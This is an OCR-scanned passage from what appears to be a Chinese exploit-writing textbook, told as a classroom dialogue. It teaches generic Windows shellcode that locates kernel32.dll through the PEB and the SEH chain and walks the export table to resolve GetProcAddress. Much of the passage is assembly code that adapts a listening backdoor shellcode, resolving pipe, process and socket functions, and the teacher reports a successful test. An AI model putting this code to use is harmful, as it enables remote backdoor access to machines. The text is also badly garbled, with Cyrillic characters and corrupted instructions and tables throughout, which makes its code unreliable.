"EE ! 和 暴力 搜索 相 比 ， 简 直 是 天 壤 之 别 啊 1 

“呵呵 1 程序 设计 真 的 是 门 艺术 啊 ! 顺便 说 一 下 ， 在 刚刚 结束 的 29 届 ACM 国 际 大 学 生 程序 设计 
竞赛 亚洲 赛区 预赛 北京 赛 的 比赛 中 ， 上 海 交 大 以 五 道 的 成 绩 获 得 冠军 ! 我 们 学 校 队 过 了 三 道 
题 ， 获得 铜 奖 。 

老师 有 点 可 惜 的 说 :“ 这 次 很 有 希望 啊 ， 就 差 最 后 一 点 的 突破 了 。 大 家 多 努力 啊 ! 你 们 是 八 九 
点 钟 的 太阳 | 以 后 的 希望 就 在 你 们 的 身上 了 。” 

“如 果 能 够 代表 学 校 去 北京 参加 亚洲 预赛 的 话 ， 太 精彩 了 | ”大 家 的 气势 被 带动 了 起 来 。 


平 强 心 想 ， 目 己 在 大 学 生涯 中 一 定 要 不 断 努 力 ， 努 力 ， 再 努力 p 大 学 生活 充满 阳光 ， 目 己 也 
需要 元 满 激情 和 挑战 ; 希 刻 在 目 己 毕业 时 ， 能 对 这 四 年 青 答 岁月 无 悔 ， 还 能 像 现 在 这 样 ， 对 
ZK3K 03553 412548 | 

“好 ， 我 们 回 到 程序 中 ， 来 测试 一 下 。 EWIE FM У ER, ЕМСЕ Л Л, S, 
然后 调试 执行 ， 当 执行 完 mov eax, [eax + 0x08] 时 ， 可 以 看 到 eax 中 保存 了 我 们 正确 的 
kernel32.dll 的 地 址 一 一 XP 系统 SPO 下 为 0x77E40000。 如 图 6 一 3。” 


*.. FamdKEecrmelËEyPEB ШісгозоЁ+ Vaizual Cq [break] [FindÉcrnclByzgPEB.cppj 
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#include<stdio .hy 


Hinelude <windous .hy 
int main() 
( 
unsigned long AddKer; 
LoadLibrary("kerneldg2''); 
_ asm 
{ 
nou гах, Fs:Bx3B РЕВ 
mou гах, [еах + üxüc] ;Lor 
nou esi, [eax + Йх1г] ‚Flink 
Lodsd 
nou eax, [eax + Hx88] jeant- E kernela? dll 的 地址 
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“Е | EAX 真 的 是 77E40000 啊 ! 实在 太 方 便 了 。 


I 


"qm, ФПЖ, "ЖП ^н, "5B uh) Bb xE EAD КЕННЕ У. 
“也 是 与 系统 结构 相关 吗 ? ” 


“当然 ， 完 全 是 Windows 系 统 的 结构 让 我 们 可 以 使 用 这 种 方法 ， 如 果 拿 到 Linux 下 ， 惑 完全 行 不 
通 了 。 


“动态 获得 函 数 地 址 的 部 分 和 yuange 使 用 的 方法 是 一 样 的 。 ”老病 说 道 ,“ 融 是 利用 Kernel32.d 
中 的 引出 表 ! ” 


“每 个 dll 都 有 引出 表 ， 这 样 ， 外 部 程序 可 以 调用 dll 里 实现 的 丽 数 ， 而 不 必 关 心 实现 的 细节 。" 老 
渍 接着 说 ，“ 而 GetProcAddress 是 在 kernel32.dll 里 实现 的 ， 所 以 我 们 可 通过 查找 kernel32.dl| 的 
| 出 表 来 找到 GetProcAddress 男 数 。 


“查找 引出 表 ? 什么 意思 ?” 
“ 嗯 ， 这 束 要 解释 一 下 引出 表 和 我 们 找 地 址 的 过 程 了 。 有 扣 奢 烦 ， 大 家 可 要 集中 扣 精 伸 听 啊 1” 
“首先 ， 引 出 表 的 结构 如 下 :” 


Typedef struct _IMAGE EXPORT DIRECTORY 


Characteristics; 4 

TimeDateStamp 4 

MajorVersion 2 

MinorVersion 2 

Name 4 模块 名 字 

Base 4 ÆA, ЈП ЕРЕ Е SA HEB B5 ë 
NumberOfFunctions 4 

NumberOfNames 4 

AddressOfFunctions 4 指向 函数 地 址 数组 
AddressOfNames 4 画 数 名 字 的 指针 地 址 
AddressOfNameOrdinal 4 指向 输出 序列 号 数组 


每 个 字段 的 解释 如 表 1。 


Qha d TR PCS HUS 


DWORD 


| DWORD | TimeDateStamp 


Майен 





DWORD 





“不 用 去 记 它 ， 记 下 来 也 没 用 。 我 们 只 















指向 一 个 ASCII 318 Ф) КТА ,这 个 字符 审 是 与 这 些 输出 孙 
| 数 关联 的 DLL 的 名 字 ( 例如 ，KERNEL32.dl ) 

这 个 字段 包含 用 于 这 个 可 执行 文件 输出 表 的 起 始 序数 值 ( Ж 
数 ) 。 正 常情 况 下 ,这 个 值 是 1, 但 是 并 不 需要 非得 这 样 。 
当 通 过 序数 来 坦 询 一 个 输出 旨 数 时 ,这 个 值 从 序数 里 该 减 去 ， 
| 结果 用 做 进入 输出 地 址 表 ( EAT ) 80951 


数值 没有 代码 或 数据 被 输出 

输出 函数 名 称 表 СЕНТ) 里 的 条 目 数量 。 这 个 值 总 县 小 于 或 
等 于 NumberOfFunctions 域 值 。 小 于 的 情况 发 生 在 符号 只 通 
过 序数 来 输出 时 。 另 外 ， 当 被 赋值 的 序数 里 有 数字 间距 时 也 


会 有 小 于 的 情况 ， 这 个 值 也 是 输出 序数 表 的 长 度 ( 见 下 文 ) 


EAT 的 RVA。EAT 是 一 个 RVA 数组 ， 数 组 中 的 每 一 个 非 季 


| 的 RVA 都 对 应 于 一 个 被 输出 的 符号 
ENT ÉJ RVA. ENT 是 一 个 指向 ASCI 87) RVA WH. 


每 一 个 ASCH 字符 串 对 应 于 一 个 通过 名 字 输 出 的 符号 。 这 个 
囊 是 排序 的 ， 所 以 ASCII 字符 串 也 是 按 顺 序 排列 的 。 这 人 允许 
加 载 器 在 查询 一 个 被 输出 的 符号 时 用 二 进 制 查找 方式 。 名 称 


的 排序 是 二 进 制 用 像 C++ RTL 中 stremp 男 数 提供 的 一 样 )， 
和 而 不 是 一 个 环境 特定 的 字母 顺序 

输出 序数 表 的 RVA 。 这 个 表 是 字 的 数组 。 这 个 表格 ENT 中 
的 数组 索引 映射 到 相应 的 输出 地 址 表 条 目 


天 心 最 后 几 个 字段 ， 如 图 6 一 4。” 


6.1.3 HKZ., PEB3&RXGetProcAddreesER29 Th XE 


EL ШШШ —ww НЕНЕН 


素 示 簿 出 悍 性 的 旗 标 。 目 前 还 没有 定义 , E 0 
输出 表 创 建 的 时 间 ，。 учту? 

IMAGE NT HEADER.FileHeader TimeDateStamp € GMT 时 
[8] , 从 1970 年 1 月 1 日 开始 计算 的 秒 数 ) 有 相同 的 定义 

| 输出 表 的 主 版 本 号 。 未 使 用 ,设置 为 0 
输出 表 的 次 版 本 号 。 未 使 用 ,设置 为 0 





EAT 中 的 条 目 数量 。 注 意 一 些 条 目 可 能 是 0， 表明 用 这 个 序 
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引出 表 


国 数 地 直 数 组 






NumberofEunctions=3 
NumberOfNames-2 
+0х1с|  AddressOfFuncLions 
+0х20 AddressOfNames 一 
+0х24 | AddressOtfNameOrdinals | 


"IB ЖЖ t РА LE BS ESTE Ez hi SU 

图 6 一 4 中 的 字段 涵义 : 

NumberOfFunctions 字 段 : 为 AddressOfFunctions 指 向 的 函数 地 址 数组 的 个 数 ， 此 例 中 ， 
#523; 

NumberOfName 字 段 : 为 AddressOfNames 指 向 的 函数 名 称 数组 的 个 数 ， 是 2 ; 
AddressOfFunctions*E Ez : 指向 模块 中 所 有 画 效 地 址 的 效 组 ; 

AddressOfNames= Ex : 指向 模块 中 所 有 画 数 名 称 的 数组 ; 
AddressOfNameoOrdinals 字 段 : 指向 AddressOfNames 数 组 中 男 数 对 应 序数 的 数组 。 


“我 们 查找 男 数 地 址 时 ， 先 在 玉 数 名 称 数组 中 找到 需要 的 函数 名 ; 然后 在 范 数 序号 效 组 中 得 到 
对 应 的 范 数 序号 ; 最 后 根据 这 个 序号 ， 在 范 数 地 址 数组 中 得 到 对 应 的 地 址 值 。” 


“好 抽象 啊 1 3- 0] | 老病， 给 个 例子 吧 1 " 玉 流 喷 道 。 
“好 ， 上 比如 我 们 在 那个 引出 表 中 查找 MyFunc3 画 数 的 地 址 。 


“ 先 从 AddressOfName 开 始 ， 依 次 在 函数 名 数组 中 查找 与 MyFunc3 相 同 的 项 ， 从 而 得 到 
MyFunc3 在 函数 名 数组 中 是 第 几 个 函数 。 在 图 6 一 4 的 例子 中 ，MyFunc3 是 第 二 个 回 数 。” 


“然后 ， 我 们 从 AddressOfNameOrdinals 开 始 ， 在 函 л ur Ч {лу ВУЛЕ 
5. TEERZAUF EAR, Е РЕ ZUBBIBE S 46 ЕЗ 


“最 后 ， 根 据 序号 3， 从 AddressOfFunctions 开 始 的 函数 地 址 数组 中 查找 MyFunc3 函 数 的 地 
址 。 ТЕБИ F —— "BOB xEOXx400197, ix, RME] f MyFunc3ER 2: B 3b E 
— —0x4001 97, 


“我 ， 是 这 样 啊 1” 
“但 ...... 输 出 表 在 哪 】 LIE ? ”一直 没 说 话 的 于 强 АВЕ 28 o 


呵呵， 知道 了 kerner32.dll 的 基地 址 后 ， 其 PE 头 部 偏 移 在 kerner32.dll 基 址 十 0x3C 的 地 方 ; 而 
ia 出 表 的 位 置 在 kerner32.dll 基 地 址 +PE 头 部 地 址 +0x78 的 地 方 。” 


“而 kerner32.dlI 的 基地 址 我 们 刚刚 学 会 了 : 从 PEB 中 获得 。 什 么 预 各 工作 都 完成 了 ， 我 们 来 看 
看 搜索 落 数 地 址 流程 吧 ! ”老病 说 道 。 


.通过 TEB/PEB 获 取 kernel32.dll 基 址 
b. 在 ( 基 址 +0x3c) 处 获取 e_lfanewc 束 是 PE 标志 。 
c. 在 ( 基 址 +e_lfanew+0x78) 处 获取 引出 表 地 址 (后 面 为 描述 方便 简称 export) 


d. 在 ( 基 址 +export+0x1c) 处 获取 AddressOfFunctions、AddressOfNames、 
AddressOfNameOrdinalse, 


e. 搜索 AddressOfNames， 确 定 “GetProcAddress" 所 对 应 的 index 
f. index = AddressOfNameOrdinalse [ index ]; 
g. 函数 地 址 = AddressOfFunctions [ index ]; 


比如， 我 们 想 查 找 GetProcAddress 的 地 址 ， 就 在 函数 名 称 数 组 中 ， 搜 索 GetProcAddress 的 
名 称 ; 找到 后 根据 编号 ， 在 序号 数组 中 ， 得 到 它 对 应 的 序号 值 ; 最 后 根据 序号 值 ， 在 地 址 数 
组 中 ， 提 取出 它 的 地 址 。 其 汇编 代码 如 下 ， 并 给 出 了 详细 的 解释 。” 


asm 


{ 
mov ebp, 0x77E40000 ;kernel32.dll 基 址 


mov eax, [ebp+3Ch] ;eax = PE 首部 

mov edx, [ebp+eax+78h |] 

add edx,ebp ;edx = 引出 表 地 址 

mov ecx , [edx+18h] ;ecx = НЕ ЈА 
mov ерх, [edx+20h ] 

add ebx, ebp ;ebx = 21, AddressOfName 
search: 

dec ecx 

mov esi, [ерх+есх* 4] 

add esi,ebp ;依次 找 每 个 函数 名 称 

; GetProcAddress 

mov eax,0x50746547 

cmp [esi], eax; 'PteG' 

jne search 

mov eax,0x41636f72 

cmp [esi*4],eax; 'Acor' 

jne search 

; 如果 是 GetProcA， 表 示 找 到 了 

mov ebx, [edx+24h] 

add ebx,ebp ;ebx = 序号 数组 地 址 ,Addressof 
mov cx, [ebx+ecx*2] ;ecx = 计算 出 的 序号 值 

mov ebx, [edx+1Ch] 

add ebx,ebp ;ebx 三 函数 地 址 的 起 始 位 置 ，AddressofFunction 
mov eax,[ebx+ecx*4] 

add eax,ebp ;利用 序号 值 ， 得 到 出 GetProcAddress 的 地 址 


“我 们 来 测试 一 下 吧 ! 在 VC 中 家 入 汇编 ， 并 单 步调 试 ， 执 行 到 最 后 一 句 时 ， 可 以 发 现 EAX 是 
0x77E5A5FD， 即 得 到 了 我 们 系统 XP SP0 的 GetProcAddress 辑 数 的 地 址 : 0x77E5A5FD， 如 
图 6 一 5。 » 
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jne search 国 
nuu Pax,üxhT636F72 


cmp | e5i*a],eax; “CO 
jne PAarrh 
;加 果 是 GetProch， 表 示 找 到 了 
* nou ерх, edx«zan] 
add ebx,ebp :ebx = A| Etti. Addressif 
mou сх,[еһх+егх®2] ;ecx = TE THIS S| |F IÉ 
ишш elbx,[elx*16Gh] 
add ebx, ebp :ebx = ӨЮ НЕРАЛ 5 ,ñddressüFFunctiaon 
nav eax,[ebx«Pcxe«h] 
add eax,ebp FARA На, VERE Ieetrrocadaressig ht 
i | 
return B; 
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“我 们 直接 获得 地 址 看 看 ! 如 图 6 一 6， EAX 果然 也 是 一 样 ，XP SP0BJGetProcAddressEq2% Hh 
址 就 是 0x77ES5AS5FD 1 ” 
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[^] global member: 








agasgBhnp1 BA CC CC 

парео Fd RB rep stos duord ptr [edi] = 

Dr #/unsiqned long fiddkKer ; 

б: GetProcfddress(LoadLibrary(' kernel32"),"GetProcRddress"); 

BBOXAOBDS SH FN mou esl.esp 

полова 68 HN FF лі Aë push offset string "GetPraochddress'" (BBüulFFRA) 

üaganBhpF SH FE mou edi esp 

AA4ARLET ó8 1C FA ^1 Bñ push offset string "kerne132" (BÜB84FB1c) 

AA4ARLES FF 15 38 151 h? BB call dwuord ptr [ imp LoadLibraryA (30525138)] 

Bü85BHBhEC 3H FE спр edi esp 

Bü3BBHEE EB 8D 5E FF FI call . chkesp (HHAHTHBBH) 

Волов З 5 push гах 

全 相生 站 四 世上 а FF 15 5C h1 42 BH call duord ptr [ imp GetProchddressi8 (8652515c;] 
Eb HdHAUENFH ЗЕ FN cnp esi, esp 

HBMABBIFE ES FF 5B FF FF Call | tchkesp (Bhd gea) 

TE: 

B: Ja ы 
£ T * 












=| EAX = | ^ 0«00241EB4 
— EBX = 7FFDFüBO rosa vel 

ECX = 77F51BE2B 

EDX = 77FC5825 = 

ESI = @BT1?FF335 

EPI = BB 2FFZ3H 

EIP = BmñunnuF ñ E 

ESP = üB2FF3A^ 

ЕВР = B12FF8B 

EFL = ünBüD2BD2 

Cs = 0018 05 = BH22 

[5 = Büm27]J 55 = PAZI 

F5 = 0039 GS = papa 
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"EE 1! 太 妙 了 1” 大 家 说 


我 们 把 获得 Kernel32.dll 地 址 部 分 和 获得 函数 地 址 部 分 合 起 来 ， 束 可 动态 得 到 
GetProcAddress 函 数 的 地 址 ， 而 且 与 系统 版 本 是 无 关 的 1” 


“在 动态 得 到 了 GetProcAddress 事 数 的 地 址 后 ， 我 们 再 使 用 它 来 动态 获得 其 他 函数 的 地 址 ， 
半生 成 的 ShellCode 束 是 通用 的 了 。 我 们 结合 实际 例子 来 应 用 它 吧 1 ” 


6.1.4 通用 ShellCode 的 编写 一 一 监听 后 门 


“我 们 把 以 前 写 的 双 管 道 后 门 ShellCcode 改 成 各 系统 通用 的 版 本 吧 | "老病 说 道 ,，“ 我 们 用 刚才 的 
思路 ， 在 获得 了 GetProcAddress 国 数 的 地 址 后 ， 再 调用 GetProcAddress， 这 样 获得 所 有 要 使 
用 的 函数 地 址 后 ， 存 起 来 就 可 以 了 。 


AKARABA ko 


Z yay AOK, 6038: EREBDABUBJABAT ShellCode, —A Emea Б 4#1Т7ЕХР SPO 下 的 地 址 存 
放 了 起 来 ， 所 以 不 通用 。 我 们 修改 时 ， 只 需 加 上 一 段 动态 获得 各 函数 地 址 的 代码 ， 然 后 再 存 
放 就 可 以 了 。” 


“具体 来 说 ， 原 来 的 实现 是 直接 存放 地 址 值 。 


是 这 样 的 ， 


// 原 来 的 实现 ， 把 要 用 到 的 函数 地 址 存 起 来 一 以 下 都 是 XP SPO 


MOV 
MOV 
MOV 
MOV 
MOV 
MOV 
mov 
mov 
mov 
mov 
mov 
mov 
mov 
mov 
mov 
mov 
mov 
mov 
mov 
mov 
mov 
mov 
mov 
mov 
mov 
mov 


“而 现在 ， 


eax, Ox77e5727a 
[ebp+4], eax; 

eax, 0x77e41bb8 
[ebp+8], eax; 

eax,0x/7/e97624 
[ebp*12], eax; 
eax, 0x77e59d8c 
[ebp*16], eax; 
eax, 0x77e58b82 
[ebp*20], eax; 
eax, 0x7 7eb5cb5 
[ebp*24], eax; 
eax, 0x71a241da 
[ebp*28], eax; 
eax,0x71a23c22 
[ebp*32], eax; 
eax, 0x/1a23ece 
[ebp*36], eax; 
eax, 0x71a25de2 
[ebp*40], eax; 
eax, 0x71a2868d 
[ebp*44], eax; 
eax, 0x71a21af4 
[ebp*48], eax; 
eax, 0x71a25690 
[ebp*52], eax; 


我 们 首先 加 上 一 


CreatePipe 


CreateProcessA 


PeekNamedPipe 
WriteFile 
ReadFile 
ExitProcess 
WSAStartup 
socket 

bind 

listen 

accept 

send 


recv 


Ex BU TET 25 A 3$ HX GetProcAddressER Zi Hb iE BA 5, ' 


mov eax, fs:0x30 ;PEB 

mov eax, [eax + ОхОс] ;Ldr 

mov esi, [eax + Ох1с] ;Flink 

lodsd 

mov edi, [eax + 0x08] ;edi 融 是 kerne132 .d11 的 地 址 
mov eax, [edi-3Ch] ;eax = PE 首部 

mov edx, [edi+eax+78h] 

add edx,edi ;edx = 输出 表 地 址 

mov ecx, [edx+18h] ;ecx = НЕ ЈА 

mov ebx, [edx+20h] 

add ebx,edi ;ebx = #1 #1, AddressofName 
search: 

dec ecx 

mov esi, [ebx+ecx*4] 

add esi,edi ; ЖЕЕ 

; GetProcAddress 

mov eax,0x50746547 

cmp [esi], eax; 'PteG' 

jne search 

mov eax,0x41636f72 

cmp [esi*4],eax; 'Acor' 

jne search 

;如 果 是 GetProcA， 表 示 找 到 了 

mov ebx, [edx+24h] 

add ebx,edi ;ebx = 索引 号 地 址 ，Addressof 

mov сх, [ерх+есх*2] ;ecx = 计算 出 的 索引 号 值 

mov ebx, [edx+1Ch] 

add ebx, edi ; ерх = БВУ т, Address0fFunction 
mov eax, [ерх+есх* 4] 

ааа eax,edi ;利用 索引 值 ， 计 算出 GetProcAddress 的 地 址 


“然后 ， 依 次 动态 获得 CreatePipe、CreateProcessA 等 本 数 的 地 址 ， 蔡 换 直 接 存放 的 值 。 比 
Bl, #СгеаіеРірер Zi b iÉ RS SOT : ” 


push dword ptr 0x00006570 
push dword ptr 0x69506574 
push dword ptr 0x61657243 
push esp 

push edi 

call [ebp-*76] 

mov [ebp-4], eax; CreatePipe 


老病 解释 道 : “相当 于 执行 GetProcAddress (кегпе!І 3221}, "CreatePipe") 。 还 是 一 样 ， 先 
把 参数 CreatePipe 字 符 串 地 址 和 kernel32 的 基 址 值 依次 入 栈 ， 然 后 call СеіРгосАаагеѕѕ ýx 
的 地 址 《我 们 之 前 把 它 存在 ebp+76 的 地 方 ) ， 所 以 call [ebp+76] 554517 7 GetProcAddress 
(kernel32&&tE, "CreatePipe") 这 句 话 。Eax 为 返回 值 一 一 CreatePipe 函 数 的 地 址 ， 我 们 把 它 
存在 对 应 的 ebp+4 的 地 方 。” 


"8 1 "同学 们 明白 了 ，“ 后 面 的 函数 也 是 这 样 获取 ?” 


“是 的 1" 老 病 说 到 ，“ 但 要 注意 ， 像 Socket 一 类 套 接 字 回 数 的 地 址 ， 不 是 在 kernel32.dll 中 ， 而 
是 在 Ws2 32.dll 中 | 所以， 我 们 要 先 LoadLibrary("Ws2. 32.011") 获得 Ws2 32.d| 的 基 址 ， 再 用 
GetProcAddress (Ws2 32.dl 基 址 ,”socket”) 来 获取 类 似 套 接 字 函 数 的 地 址 。” 


“具体 说 来 ， 融 是 要 加 上 如 下 获取 函数 地 址 的 代码 。” 


push ebp; 


sub esp, 100; 

mov ebp,esp; 

mov eax, fs:0x30 ;PEB 

mov eax, [eax + 0Ox0c] ;Ldr 

mov esi, [eax + Ox41c] ;Flink 

lodsd 

mov edi, [eax + 0x08] ;edi 束 是 kerne132 .d11 的 地 址 
mov eax, [edi-3Ch] ;eax = PE 首部 

mov edx, [edi+eax+78h] 

add edx,edi ;edx = 输出 表 地 址 

mov ecx, [edx+18h] ;ecx = 输出 函数 的 个 数 

mov ebx, [edx+20h ] 

add ebx,edi ;ebx = #1 #1, Адагеѕѕ0ҒМате 
search: 

dec ecx 

mov esi,[ebx+ecx*4] 

add esi,edi ;依次 找 每 个 函数 名 称 

;GetProcAddress 

mov eax,0x50746547 

cmp [esi], eax; 'PteG' 

jne search 

mov eax,0x41636f72 

cmp [esi*4],eax; 'Acor' 

jne search 

;如 果 是 GetProcA， 表 示 找 到 了 

mov ebx, [edx+24h] 

add ebx,edi ;ebx = 索引 号 地 址 ,Addressof 

mov сх, [ebx+ecx*2] ;ecx = 计算 出 的 索引 号 值 

mov ebx, [edx+1Ch 

add ebx,edi ;ebx= WEHA EME, AddressOfFunction 
mov eax, [ebx+ecx*4] 

add eax,edi ;利用 索引 值 ， 计 算出 GetProcAddress 的 地 址 
mov [ebp+76]，eax ;把 GetProcAddress 的 地 址 存在 ebp+76 中 
push 0x0 

push dword ptr Ox41797261 

push dword ptr Ox7262694c 

push dword ptr Ox64616f4c 

push esp 

push edi 

call [ebp+76] 

mov [ebp+80], eax; LoadLibraryA ;把 LoadLibraryA 的 地 址 存在 ebp 十 80 中 
push dword ptr 0x00006570 

push dword ptr 0x69506574 

push dword ptr 0x61657243 

push esp 

push edi 

call [ebp+76] 

mov [ebp+4], eax; CreatePipe 0x00006570 69506574 61657243 
push dword ptr 0x00004173 

push dword ptr 0x7365636f 

push dword ptr 0x72506574 

push dword ptr 0x61657243 

push esp 

push edi 

call [ebp-*76] 

mov [ebp+8], eax; CreateProcessA 0х4173 7365636f 72506574 61657243 
push dword ptr 0x00000065 

push dword ptr 0x70695064 

push dword ptr Ox656d614e 

push dword ptr O0x6b656550 

push esp 

push edi 

call [ebp+76 

mov [ebp-12], eax; PeekNamedPipe 0х00000065 70695064 656d614e 6b656550 
push dword ptr 0x00000065 

push dword ptr O0x6c694665 

push dword ptr 0x74697257 

push esp 

push edi 

call [ebp-*76] 

mov [ebp-16], eax; WwriteFile 0х00000065 0х6с694665 0x74697257 
push dword ptr 0 


push dword ptr 0х656с6946 

push dword ptr 0x64616552 

push esp 

push edi 

call [ebp+76] 

mov [ebp+20], eax; ReadFile 

push dword ptr 0x00737365 

push dword ptr 0x636f7250 

push dword ptr 0x74697845 

push esp 

push edi 

call [ebp+76] 

mov [ebp+24], eax; ExitProcess 0x00737365 0x636f7250 0x74697845 
push dword ptr 0x00003233 

push dword ptr 0x5f327357 

push esp 

call [ebp+80] ;LoadLibrary(Ws2 32) 0x00003233 5f327357 
mov edi, eax 

push dword ptr 0x00007075 

push dword ptr 0x74726174 

push dword ptr 0x53415357 

push esp 

push edi 

call [ebp-*76] 

mov [ebp+28], eax; WSAStartup 0x00007075 0x74726174 0x53415357 
push dword ptr 0x00007465 

push dword ptr Ox6b636f73 

push esp 

push edi 

call [ebp-*76] 

mov [ebp-32], eax; socket 0x00007465 0Ox6b636f73 
push dword ptr 0 

push dword ptr 0x646e6962 

push esp 

push edi 

call [ebp-*76] 

mov [ebp+36], eax; bind 0x646e6962 
push dword ptr 0x00006e65 

push dword ptr 0x7473696c 

push esp 

push edi 

call [ebp-*76] 

mov [ebp-40], eax; listen 0x00006e65 0x7473696c 
push dword ptr 0x00007470 

push dword ptr 0x65636361 

push esp 

push edi 

call [ebp+76 

mov [ebp-44], eax; accept 0x00007470 0х65636361 
push 0 

push dword ptr 0x646e6573 

push esp 

push edi 

call [ebp+76 

mov [ebp-48], eax; send 0x646e6573 
push 0 

push dword ptr 0x76636572 

push esp 

push edi 

call [ebp+76 

mov [ebp-52], eax; гесу 0x76636572 
mov eax, OxO 

mov [ebp+56],0 

mov [ebp+60], © 

mov [ebp+64],0 

mov [ebp+68],0 

mov [ebp+72],0 

LWSAStartup: 


“动态 获取 每 个 函数 的 地 址 后 ， 剩 下 的 代码 就 完全 不 用 改变 。 我 们 把 它 合 起 来 后 ， 得 到 
baer et cop OG ASIE) 。 绸 测试 一 下 ， 果 然 成 功 了 上 如 图 6 一 7。” 
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таш [ebp«BH] еах = 2804-11-15 23:26 1.425 testJeno . dsp 
' т š 
[2894-11-15 5:5 3.589 ЕіпаХетпе1ВуРЕВ. д=р 


Е a Рап йсгпо 1ВУуРЕВ „гы: Б 
GJ. be testdleno. opt 
F7E62168 г B Su rir —1 3:53 eDIRS Do hary 
LR FIFSTBZE [2 Be 5 TRE: 49.664 Еіпахеупе lByPEB .opt 
TIFÜSHSN - š i = 





T7E663406D 
T > 





Ready Ln 193, Col 5 АЕССТФ s 4 55 B 
“欢迎 大 家 来 到 一 一 宇宙 通用 版 ! "老病 说 道 

"IE 1 太 Cool 了 1 "教室 里 一 阵 欢 腾 ， 把 中 国 队 7:0 都 没有 出 线 的 态 伤 抛 在 了 脑 后 。 

“ 接 下 来 大 家 应 该 知道 做 什么 了 吧 ? "老病 笑 

“了 呵 ? 做 什么 呢 ?” ВУ [9] 38 

“提取 ShellCode 啊 1" 老病 可 一 点 儿 不 含糊 。 


"EE l 这么 长 的 代码 ， 好 可 怕 啊 1" 连 一 同 勤 奋 的 古风 都 受 不 了 一 句 句 抄写 的 “折磨 ”，“ 有 没有 笨 
单 氮 的 方法 啊 ?7 


"uH, "老病 打量 了 一 下 代码 说 道 ， ‘TARK —— 反正 大 家 的 思路 都 清楚 了 ， Bit; x IER 
f. ` 


“т, ЕШШ ! "= F J| 齐 声 说 道 。 


“好 ， 那 这 次 就 先 别 提取 了 ， 留 在 我 们 讲 ShellCode 提 取 技 巧 时 再 说 吧 ! 我 们 继续 看 其 他 的 方 
法 。 


“好 啊 1 "大 家 不 用 做 单调 的 震 力 活 ， 高 兴 ing.……… 


6.1.5 方法 三 、SEH 获 得 kernel 基 址 


海纳百川 ， 有 容 力 大 上 "老病 说 道 , "我们 再 看 看 其 他 动态 获得 男 数 地 址 的 方法 吧 ! 大 家 可 以 
了 解 各 种 方法 的 优 劣 ， 在 不 同 的 时 候选 用 不 同 的 方法 。， 


m, Er 


还 有 个 比较 有 名 的 方法 ， 是 通过 SEH 异 常 处 理 链 来 获得 Kernel32.dll 的 基 址 ， 再 采用 引出 表 的 
方法 ， 获 取 加 数 的 地 址 。” 


“ 哦 ?怎么 通过 SEH 获 得 Kernel32.dl| 的 地 址 呢 2 "大 家 感 兴趣 的 问 道 。 


“呵呵 ! 前 面 大 家 已 经 接触 过 了 上 默认 异常 处 理 玉 数 一 一 UnhandledExceptionFilter， 还 记得 它 

9» 2” 

“HAr, ЕНЕНЕ, 3&41— xA EH 2 =a iX ЖД ЈА Fe t 2& EB Eq ДЕ E EORR S РЕ 
权 的 。 

“对 ， 这 里 我 要 说 的 是 ，UnhandledExceptionFilter 指 针 是 在 异常 链 的 最 后 ， 它 的 上 一 个 值 是 指 


同 下 一 个 处 理 点 的 地 址 。 因 为 后 面 没有 异 弟 处理 点 了 ， 所 以 应 该 是 0xXFFFFFFFF。 如 图 6 一 
8, » 


«— Fs: [0] HB [u] 


ELT 地址 


emp [ЕЕЕ 


处理 程 序 2 地 址 ° 


FFFFFFFFh + 一 链表 结束 
JnhandledEzceptionF:ilte 





根据 这 个 原理 ， 我 们 可 以 搜索 异常 链 ， 得 到 UnhandledExceptionFilter 的 地 址 ， 方 法 和 代码 如 
[е 


mov esi,fs:0 

lodsd 

GetExeceptionFilter: 

стр [eax],Oxffffffff 

je GetedExeceptionFilter // 如 果 到 达 最 后 一 个 节点 
mov eax, [eax] // 否 则 往 后 通 历 ,一 直到 最 后 一 个 节点 
jmp GetExeceptionFilter 
GetedExeceptionFilter: 

mov eax, [eax+4 


“测试 一 下 ， 最 后 一 句 执 行 时 ， 得 到 我 们 的 UnhandledExceptionFilter 地 址 为 0x77E7BB86。 如 
图 6 一 9 中 的 EAX 值 。 





'. FandÉernelEySEE = Micrezsoft Visual CH [break] [FindKernelByrSEH. cpp] 
img 7n 
File Ed:t View Даага [Project Debug Tools ]riverstudio Windew Help =m |x 
Bog * um Sv: T pm m Al 了 | m 
[iIGlobals] — — -j||fMIalobalmembers-| main — AA- Бр” t =l ñ 
$m e D o0 am Ru EE E 

















int main() 
i 
_ 5 
i 
mou  esi,fs:ü 
10050 
BelExerepLiunFiller: 


спр [eax], üxFFFFFFFF 


E 
mou eax, [eas] # zz mit т. 
jnp GetExeceptionFilter 


GetedExeceptiaonFilter: 
таш вах, [eaxe4à4] 


} 


return ü: 














d = ITEIBHRÓ ^ 

un 5 desi: RmPFFFR FF FF FF FF RA RR F7 77 1R SA F? 77 AA AA RA AA — ... IAEE PEE... ^ 

EDX = BDN30DBB am2FFFH HB AA Bü HA Bü Dü üñ ва AB 1H ла HB BB BH EH BH .......... | .... 

FSI = RBM?FFRA am38BBH 251 ó3 7k 78 2H ов Bü ва 01 BH GB HB зс B5 вв BB йсёх ....... €.-- 

EDI = BB42FFBB BBDT130DTB C HB Bë BH во ШШ ов во 28 BB BB DD BB BB EB ШШ [|....... samasaa. Ҹ 

EIP = DOLMA 001280208 314 HB ве BH H1 ШШ ов BB оз BB BB DD 34 BB EB BU ...........- a... 

ES» = BD42FF3039 вої1з воза пс üB Dü Dü 01 ü BB во BB BÓ DB Dü ПШ HB PO ШИП l... ... „ш-ш-ш... 

EBP = BD12FF8B amgi38BnuB ва аа Bë ва ва ов ов GB па ра BB Dü B2 BË EB BHH ................ 

EFL — 808082545 = ügi3ü080580 Bü ав Bë BH во ов ов GB ве Bü BB Bü бл H1 EB BH ............ d... 

j 00150000 AA úB пе Bü AA AA 0б AA 5B 49 59 2р FB ü1 PA üÑ ........ [IY-.... 

s | | > паязаота ч» пп пй BB эһ оэ аа an ая n> пп па ча an pa ап 9o € w 

Ready Ln 18, Col 1 


ов, Ка l aa FRÉ f ОпһапаіеаЕхсеріопЕіќегр 7% 7, 18 40Kernerl32%5 
基地 址 有 什么 天 系 吗 ?"?" 吝 风 问 道 。 


“TEAM! HRA F, ОпһапаіеаЕхсеріопЕіќег х= Kernel32.dll E 187044, ЯКЕ 
TX BEP TAiETEKernel32Bg3bHEZE P. 31/1151 AUnhandledExceptionFilterBq 87А 
上 找 ， 找 到 开头 的 地 方 ， 目 然 融 是 Kerner32 的 基地 址 了 。” 


"EE 1 对 啊 1” 


“Kerner32 的 开始 标志 是 MZ 和 PE， 而 且 因 为 系统 分 配 菜 个 空间 时 ， 总 要 从 一 个 分 配 粒 度 的 边 
